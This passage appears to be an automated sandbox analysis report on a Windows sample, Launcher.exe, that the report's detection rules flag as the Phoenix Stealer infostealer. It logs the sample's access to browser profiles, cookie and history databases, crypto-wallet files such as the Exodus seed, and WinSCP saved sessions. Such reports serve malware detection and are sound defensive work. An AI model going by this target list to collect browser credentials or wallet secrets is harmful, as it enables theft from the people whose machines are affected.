          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Duck-h4TS\Browsers VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Duck-h4TS\Browsers\bookmarks.json VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Duck-h4TS\Browsers\cards.json VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Duck-h4TS\Browsers\downloads.json VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Duck-3KBP.zip VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Duck-3KBP.zip VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Duck-3KBP.zip VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Overwrites Mozilla Firefox settings
          Source: C:\Users\user\Desktop\Launcher.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite_tmpJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite_tmpJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite_tmpJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite_tmpJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Growtopia
          Source: Yara matchFile source: Process Memory Space: Launcher.exe PID: 6848, type: MEMORYSTR
          Yara detected Phoenix Stealer
          Source: Yara matchFile source: Process Memory Space: Launcher.exe PID: 6848, type: MEMORYSTR
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectronCash
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty Wallet
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\window-state.json
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.conf.json
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: (insertion_info.second) == (true)
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore\
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "author": "Exodus Movement, Inc.",
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\default_wallet
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \MultiDog\multidoge.wallet\
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\seed.seco
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore\
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Windows\System32\reg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
